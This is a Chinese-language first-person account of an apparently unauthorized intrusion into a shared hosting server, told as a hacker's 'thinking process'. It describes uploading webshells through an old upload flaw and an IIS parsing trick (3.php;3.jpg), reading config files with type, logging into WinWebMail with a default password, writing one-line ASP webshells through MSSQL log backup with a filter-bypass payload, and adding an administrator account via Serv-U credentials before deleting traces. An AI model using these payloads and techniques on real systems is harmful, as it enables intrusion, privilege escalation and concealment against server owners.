一次艰难的入侵（思路篇）

主题:一次艰难的入侵

作者:冷人

版权:3EST信息漏洞拿了个SHELL，怎么拿的就不多说了，完全是一个古老的漏洞，丢到明小子上传就拿下来。

上传了大马后，权限小的可怜，不过还好的是，WS组件还在，并且支持ASPX，这意味着目标就要拿下了，当然，其实并没有那么简单，否则就不叫艰难了...

传了大马，由于WS组件没有被删除，一般这时候只用用ASPX马上面的IIS检测功能就可以读取IIS用户密码和配置信息，直接就可以跳转到目标WEB目录。

可是，正当我以为就要拿下时，竟然发现根本没有办法读取....读取失败了...（那时我已经告诉朋友我拿下了....）
这时候，我也并不着急，因为我认为，WS还在，而且只要不出意外应该可以执行命令的，提权希望还是很大。

于是我上传CMD到C:\DocumentsandSettings\AllUsers\ApplicationData\Microsoft\MediaIndex\cmd.exe

弄过星外主机的人都知道，这个目录是有执行权限的。

在这里，我要说一下一个误区，很多人都认为，可写就可以执行命令，如果执行不了，那就代表失败了。

其实并不是这样的，可写和可执行并不一样，可写目录并不代表有权限执行命令的，所以在入侵的时候，一定要多找一些目录进行测试。
上传了CMD之后，命令确实可以执行了，不过令人纠结的是，除了set命令，其他的比如ipconfignet命令竟然都无法执行。

我看了下，发现服务器有装360的痕迹，于是我又开始上传360的利用程序。

可是，还是失败了，不光如此，还有PR.EXE等，都根本没有权限执行....权限小得可怜。

看到这里，我手里也就只剩下最后一招了，就是type命令，其实type命令在入侵中作用很大的。

只是很多人并没有在意，比如你用DIR命令查看D:\web那肯定是失败了，但是你可以用type来代替。
比如旁注的时候，我们已经知道目标的路径为D:\wwwroot\qing\web\

那我们可以通过TYPE命令来查看对方的配置信息，和源码，如果对方是MSSQL或许MYSQL的话，那效果更不用说。

即使是ACCESS数据库，我们也可以通过TYPE命令来查看对方的conn.asp来找到对方的数据库地址。

例如typeD:\wwwroot\qing\web\conn.asp

这样我们就可以看到CONN.ASP的内容了。而数据库地址就保存在CONN.ASP里面。
话题继续回到提权上，经过测试，确实是可以利用TYPE来读取文件，但是问题又来了....

我根本不知道目标的路径...所以TYPE也只能扔一边了...

过了很久，我依然找不到任何突破口。

正在这时，我发现了一个进程，至于这个进程的名字我就不记得了，这个进程看着挺像服务器的一些管理软件的。

于是我百度了下这个进程，发现原来是WinWebMail！
想起WinWebMail，我记得我曾经看过一篇文章，说的就是WinWebMail提权。

于是又百度了下资料，不过只发现关于WinWebMail提权的资料不是一般少...只找到一篇有价值的文章。

按照资料上面说，WinWebMail是权限很大的，貌似是system不过资料上说的迷迷糊糊，我也没搞过这个，并不是很清楚。

按照资料上说，WinWebMail目录传说是可写的，完全可以通过替换文件，或者上传ASP马来搞定。

不过我找了半天没有找到安装目录，最后无奈之下只好通过注册表来查找路径。

最后我才发现...原来之前我已经猜对路径了，默认的。

但是ASP马根本没有权限，连读的权限都没有，所以我以为目录不存在。

换了ASPX马后，终于可以跳转到WinWebMail目录了，激动人心的时刻~！

却发现...根本没有写的权限...Y的！谁说WinWebMail有写权限的！我砸死他！
无奈之下，只好继续查找WinWebMail的资料，据说WinWebMail的用户密码是保存在安装目录下的配置文件里的，据说是加密？
纠结的速度，读取了配置文件，发现密码好像竟然是默认的....竟然是admin.....
至于邮局的登陆口，其实我之前就在旁注查询的时候就已经找到了。

adminadmin登陆，从某人的文章里看到，说得到了密码进入后，就咋牛咋牛了...我也那么认为...我以为进入邮局后，直接拿了SHELL不就日下了？

结果我很疼的发现...这根本跟我们用的邮箱没有其别嘛....
搞了半天，又翻了半天WinWebMail的WEB目录，楞是拿不下来...

不过不管怎么样也是管理员权限....可以管理其他邮局用户，但是这个好像并没有多大用...我也懒得看了。

搞了半天，此时都快很晚了，我依然没有任何进展....

无奈之下，我想起了之前我在旁注查询的时候，好像记得有个站是ASPX的，于是只好搏一搏运气，打算去日那个ASPX的站。

其实这个站好像是男生用品的商场....

简单扫了下，没想到密码默认....直接进入后台了。

不过后台很多功能损坏了，最后还好，找到一个没有损坏的上传文件管理，并且上传并没有重命名文件。

上传过滤ASP，但是却没有过滤PHP，直接利用IIS解析上传3.php;3.jpg日了下来。
到了这里，自然是传大马了。

让人发疯的事....依然存在很多的.....
我发现，我换了无数匹马，ASP,PHP,ASPX都不行.....上传后竟然全部无法执行啊！！！
最后我干脆把PHP一句话保存JPG格式，然后利用IIS解析上传，再用菜刀来连接。

我也懒得传大马了，毕竟我入侵这个ASPX的站，只是为了看看是否是MSSQL数据库。

查看了配置文件，我差点没砸了电脑....

竟然发现网站好像用的是ACCESS..........

虽然如此，但是我还是继续看了下去，发现MSSQL连接哪里账号，密码，数据库名，都是888888，看到这里，心都凉了，估计这个是安装CMS的时候官方默认的例子而已。

看来真是ACCESS啊！
看到这里已经打算放弃了，但是在关闭ASPX马的时候，我还是随手测试了下这个令人巨疼的账号密码，竟然登陆成功了！！！
并且可以差异备份....激动啊！！！

到了这一步，我想这煮熟的鸭子不会再飞了吧？你大爷的....
结果通过差异备份后，竟然一句话执行出错了....

于是我想到了之前日那个ASPX的站时，上传大马发生的事，于是我又测试了下。

回到那个ASPX的站，打开小马。
使用小马上传

<%evalrequest(&quot;cnnsc&quot;)%>

上传后代码变成....

<%evalrequest(\&quot;cnnsc\&quot;)%>

代码根本无法正常执行啊！疼....

代码自动被过滤了....差异备份估计也一样的，报错的信息提示的是语法错误....

我测试了无数个方法，结果都失败了....
在差异备份的时候，我甚至把一句话，转换成了十六进制，和

┼攠數畣整爠煥敵瑳&or;&equiv;┩愾（这个是加密后的一句话）
这样加密了....都失败了....
此时已经凌晨了，给朋友打个电话，懒得再看了，本来想上3EST的，结果竟然上不了...

去黑帽发了个求助帖，睡觉....
早上起来，昨晚想了很多，甚至想过利用文件包含，不过可惜的是，上传文件包含代码，一样被过滤掉了...
最后回过头，测试了下，LOG备份，没想到竟然成功了！LOG备份没有被过滤....
费解啊...就这样，拿了SHELL，不过传了ASP大马后，竟然又发现问题了...ASPX大马执行不了...出错了...
而且CMD也执行不了，ASP权限不行啊....比不上ASPX..
不过由于WinWebMail安装在D盘，所以可以浏览D盘文件，在D盘目录下，激动啊！找到了SAROOT还有SU的密码！！！
服务器开有3389，直接SU就加了个管理员进入服务器了....

做完事后，神马事你懂的....

删除了账号和马儿，退出了服务器。
测试入侵到了这里也结束了。

不知道服务器用什么防火墙，我的ASP马被系统杀了好几次...
最后我又上了黑帽论坛，wxd回复了我的帖子，他给出的代码是<%evalrequest(chr(97))%>
于是我又打开了菜刀，上传<%evalrequest(chr(97))%>试了下，这次竟然没有被过滤了....不过我都已经拿下服务器了，这也没用了...
不过我会想了下，好像ASPX马上面差异备份好像默认的一句话，好像就是这个代码...

不过由于之前日某个站时用这个一句话备份失败了，所以刚刚开始我差异备份的时候我用的是自己的一句话。

纠结....
&nbsp;
*
*